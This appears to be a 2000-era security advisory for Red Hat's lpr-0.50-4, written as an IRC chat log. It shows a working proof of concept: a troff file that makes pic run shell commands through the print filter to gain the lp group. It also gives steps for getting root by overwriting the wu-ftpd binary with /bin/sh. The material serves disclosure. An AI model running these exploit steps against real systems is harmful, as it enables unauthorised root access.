details of an exploit agains lpr-0.50-4 (at least)
(also affects other systems that may have the same print filters)

URL       :     http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt
AFFECTS   :     lpr-0.50-4 & earlier
SEVERITY  :     local ROOT possible. 
SYNOPSIS  :     escalation of group permissions, leading to 
                exploit for every user except root is available.
                root is sometimes available as well.
                (wu-ftpd-2.6.0-14.6x binaries are owned by user
                bin, and can be overwritten allowing root access
                if wu-ftpd is installed.)


http://crash.ihug.co.nz/~Sneuro/lpd-adv.txt

This is a log of an advisory given in channel 
#roothat on irc.pulltheplug.com, October 16 2000.

!!!!!!!!!!!!!!!!!!!!!!!! start of log !!!!!!!!!!!!!!!!!!!!!!!

--> zen-parse (~empathy@p25-max6.dun.ihug.co.nz) has joined #roothat
--- Topic for #roothat is welcome to #roothat -- trivia in #trivia -- root yer 
printer and j00 get a new group of friends. and stuff.
--- Topic for #roothat set by zen-parse at Sun Oct 15 01:26:35 2000
--- noid gives channel operator status to zen-parse
<bdev> hey zen
<Safety> zen-parse
<Safety> lockdown
<zen-parse> lo all
<bdev> what's this topic all about then zen?
<zen-parse> new hole in lpr package for redhat
<bdev> and...
<bdev> ;]
<bdev> you releasing it ?
--> possem (star@203-173-242-165.nzl.ihugultra.co.nz) has joined #roothat
<zen-parse> [zen@continuity /tmp]$ id
<zen-parse> uid=500(zen) gid=500(zen) groups=500(zen)
<zen-parse> [zen@continuity /tmp]$ cat asdf
<zen-parse> .PS
<zen-parse> sh D/usr/bin/id>/tmp/yougetanyideasyetD
<zen-parse> .PF
<zen-parse> [zen@continuity /tmp]$ lpr asdf
<zen-parse> [zen@continuity /tmp]$ ls /tmp/yougetanyideasyet;cat /tmp/yougetany
ideasyet
<zen-parse> uid=500(zen) gid=500(zen) groups=7(lp)
<zen-parse> [zen@continuity /tmp]$
<zen-parse> consider it released
<zen-parse> erm... missing a line...
<bdev> heh
<zen-parse> and should be ls -al /tmp/yougetanyideasyet;cat /tmp/yougetanyideas
yet
<zen-parse> -rw-rw-rw-   1 zen      zen            39 Oct 16 22:08 /tmp/yougeta
nyideasyet
<zen-parse> as the output
<bdev> only gid lp ?
<Remmy> ehm
<Remmy> heh
<bdev> but: -r-sr-sr-x   1 root     lp          16292 Jan 10  2000 /usr/bin/lpr
*
<-- schematic|ZzZz has quit (Ping timeout)
<zen-parse> thats not where the magic happens though.
<zen-parse> ;]
<zen-parse> needs a running lpd
<zen-parse> and a printer that does troff
<zen-parse> eg: PostScript
<zen-parse> cat /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<Remmy> zen...write a bugtraq advisory
<Remmy> but get really really stoned first.
<Remmy> hehe
<zen-parse> `grog -Tps -msafer $TMP_FILE`
<zen-parse> log this... use this as an advisory. ;]
<zen-parse> that is where the magic happens.
<zen-parse> grog is a perl script that selects the correct command line options
 for groff. groff can, if asked run a variety of other programs, such as eqn(fo
r equations) tbl(for tables) and pic(for compiling pictures).
<zen-parse> the -msafer means to disallow the call to any dangerous functions, 
such as executing a command or creating or modifying a file. 
<zen-parse> However pic is called without that option being passed, even though
 it does have a -S switch, which runs it in safer mode.
<possem> zen-parse
<zen-parse> The lpd checks what type of file the file is
<zen-parse> with a program called file
<bdev> hmm
<Remmy> looks perty yummy
<zen-parse> the type of this file is troff or preprocessor... 
<-- possem has quit (Quit: )
<zen-parse> so the daemon then it hands it to the apropriate filters to print, 
one of them being /usr/lib/rhs/rhs-printfilters/troff-to-ps.fpi
<zen-parse> which contains the grog command, which causes groff to run pic on t
he file, and pic executes the file we speciify as the user the file was printed
 by.
<zen-parse> with one exception.
<zen-parse> you have been set to have a list of groups which just contains one 
group.    lp
<Remmy> hmm
<zen-parse> (btw: group lp can edit all the configuration files for lpd. lpd ca
n run the commands as any user (except root).
<zen-parse> however, if u have wuftpd installed, there is a root exploit.
<zen-parse> -rwxr-xr-x   1 bin      bin        162608 Oct 14 19:36 /usr/sbin/in
.ftpd
<zen-parse> lrwxrwxrwx   1 bin      bin             7 Sep 23 02:30 /usr/sbin/wu
.ftpd -> in.ftpd
<zen-parse> gain user bin, and copy /bin/sh over in.ftpd
<Remmy> heh
<zen-parse> telnet to port 21, and you have root. so it is a root exploit on sy
stems with wufptd. and just every other uid on systems with lpd runnning.
<zen-parse> )
<bdev> heh, nice
<zen-parse> there also appears to be an error file attempting to be made just a
fter priviledges are dropped, but it has insuficient writes at that moment to a
ctually succeed. the directory is owned by root, and only has lp write access b
ecause the lpd runs as root.
<zen-parse> um. you dats my advisory ;]
--- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|afk lockdown
 @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D 
<zen-parse> -- Users on #roothat: @zen-parse Safety Remmy +bdev eazyass omega|a
fk lockdown @noid Loki^moo _noah @Loki[f8] lucif3r tWiST3D 
<Remmy> ew
<zen-parse> -- zen-parse ;]
<Remmy> hehe
<Remmy> i lik eyer bigtraq posts better...
<Remmy> ya get all the leeto ascii in there and all...
<zen-parse> ok... now ima save the buffer and submit it to bugtraq ;]
<bdev> kewl
--> ThaReaper (Sir_Vomit@1Cust33.tnt50.chi5.da.uu.net) has joined #roothat
<bdev> that'd be a cool advisory

!!!!!!!!!!!!!!!!!!!!!!!!!! end of log !!!!!!!!!!!!!!!!!!!!!!!

Ob-ASCII

   /\/\    mee-errraaAAgghhhraher!
  = oo =  /
   \()/  /
  / __ \
  ||  ||

in memory of
   lucky.


Send someone a cool Dynamitemail flashcard greeting!! And get rewarded.
GO AHEAD! http://cards.dynamitemail.com/index.php3?rid=fc-41